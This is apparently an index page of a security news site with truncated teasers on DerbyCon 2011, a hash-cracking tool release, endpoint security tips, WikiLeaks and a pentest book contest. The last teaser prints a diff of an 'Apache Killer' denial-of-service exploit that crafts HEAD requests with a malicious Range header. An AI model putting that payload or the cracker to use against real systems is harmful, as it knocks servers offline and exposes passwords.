The Hacker News | #1 Trusted Cybersecurity News Site — Index Page

Derbycon 2011 Videos Talks The idea behind DerbyCon was developed by Dave Kennedy (ReL1K), Martin Bos (PureHate), and Adrian Crenshaw (Irongeek). Their motivation stemmed from a desire to see more of the old-style talks and events of the conventions of the past. DerbyCon was hosted by some specialized two-day training courses from 30th Sep-2nd Oct 2011 in Louisville, Kentucky. DerbyCon isn't just another security conference. They have taken the best elements from all of the conferences. DerbyCon is a place you can call home, where you can meet each other, party, and learn. Their goal is to create a fun environment where the security community can come together to share ideas and concepts. Whether you know Linux, how to program, are established in security, or a hobbyist, the ideal of DerbyCon is to promote learning and strengthen the community. Day 1 Adrian, Dave, Martin: Welcome to DerbyCon 2011 – Intro to the con and events KEYNOTE ~ HD MOORE – Acoustic Intrusions Johnny Long

Hash Code Cracker V 1.2 Released ~ Password Cracking from BreakTheSecurity BreakTheSecurity is proud to release the Hash Code Cracker Version 1.2. Our latest release supports Online Cracking function. Description: This password cracker is developed for PenTesters and Ethical hackers. Please Use this software for legal purposes(Testing the Password Strength). Features: This software will crack the MD5, SHA1,NTLM(Windows Password) hash codes. No need to install. Supports All platforms(windows XP/7,Linux,..). V1.2 Changelog : Included Online cracking Support Minimum Requirements: Java Runtime Environment: JRE 1.6 should be installed.(you can get it from oracle.com) How to Run the Application? Download the .zip file and extract. Extract the zip file. Open the Terminal or command prompt. Navigate to the path of Extracted zip file (i mean HashCodeCracker Folder) in Terminal/CMD. Type this command "java -jar HashCodeCracker.jar". Now the application will run. Pro

In today's digital world, where connectivity is rules all, endpoints serve as the gateway to a business's digital kingdom. And because of this, endpoints are one of hackers' favorite targets.  According to the IDC,  70% of successful breaches start at the endpoint . Unprotected endpoints provide vulnerable entry points to launch devastating cyberattacks. With IT teams needing to protect more endpoints—and more kinds of endpoints—than ever before, that perimeter has become more challenging to defend. You need to improve your endpoint security, but where do you start? That's where this guide comes in.  We've curated the top 10 must-know endpoint security tips that every IT and security professional should have in their arsenal. From identifying entry points to implementing EDR solutions, we'll dive into the insights you need to defend your endpoints with confidence.  1. Know Thy Endpoints: Identifying and Understanding Your Entry Points Understanding your network's

Linux - Means Freedom [The Hacker News Magazine] October 2011 Issue Released Dear Readers,                          We here at The Hacker News were very humbled to be given the opportunity to celebrate 10 millions hits to the website. Wow! We are so very grateful for your support and as I told you last month, I don't think Hacking is going anywhere and neither are we!! Your feedback is very important to us. Feel free to send us your thoughts and desires for Hacking news. If you want to write an editorial, let us know. We'd love to include it next month. For now, we will see you in our daily and best wishes for a great month. Content of October Edition: Linux - Means Freedom How to make my Linux Secure ? Hackathon Insider Threads Vs Hackers Linux : How to Series by Alok Srivastav Window 8 - Touch the Future The Security Model of Window 8 Server Microsoft Security Development Cycle September Cyber Attacks Download PFD version of Magazine Download Compressed rar ver

Celebrating 5th Birthday of Wikileaks  (Born : 4th Oct 2006) The wikileaks.org domain name was registered on 4 October 2006. The website was unveiled, and published its first document, in December 2006. The site claims to have been " founded by Chinese dissidents, journalists, mathematicians and start-up company technologists, from the US, Taiwan, Europe, Australia and South Africa ". The creators of WikiLeaks have not been formally identified. It has been represented in public since January 2007 by Julian Assange and others. Assange describes himself as a member of WikiLeaks' advisory board. News reports in The Australian have called Assange the " founder of WikiLeaks ". According to Wired magazine, a volunteer said that Assange described himself in a private conversation as "the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest". 2006–08 WikiLeaks posted its fi

Contest Winners Announcement : Wireless Penetration Testing Guide book We ran a competition for the book " Backtrack 5 Wireless Penetration Testing " last week. Today, Vivek Ramachandran, the author of the book and Founder of SecurityTube.net is announcing the winners in the video below. We will be contacting the winners via email soon. Two Best Comments Selected by Author are : Scott Herbert : For me it's the "man-in-the middle" and other cutting edge wireless attacks that make it a book worth getting (even if I don't win). neutronkaos : What interests me most about this book is that it is dedicated to wireless hacking. In an age where almost everybody is rocking a wireless AP, this book could do alot in offense and defense. I have been a Backtrack fan since Backtrack 3 and I have seen several of Mr. Ramachandran's primers on security tube. I am currently deployed to Afghanistan and I am working towards a degree in Network Security. I would love to have this boo

Apache killer exploit modified for better Results " 4L4N4 K!LL3R " or Killapache  DDOS tool exploit, previously coded by kingscope 's , re-edited and coded by " S4(uR4 " , which kills apache and still many websites are vulnerable. S4(uR4 rewrite this exploit on php/curl (web based) with agressive mode. Exploit Consist of 2 part : 1) Test Part (for test u need use static content of site, maybe images, text, html, doc file, etc) 2) Xploiting Part Difference B/w Old and New Modified Exploit: 40c40 < $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; --- > $p = "HEAD ".($ARGV[2] ? $ARGV[2] : "/")."HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; 56c56 < $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; ---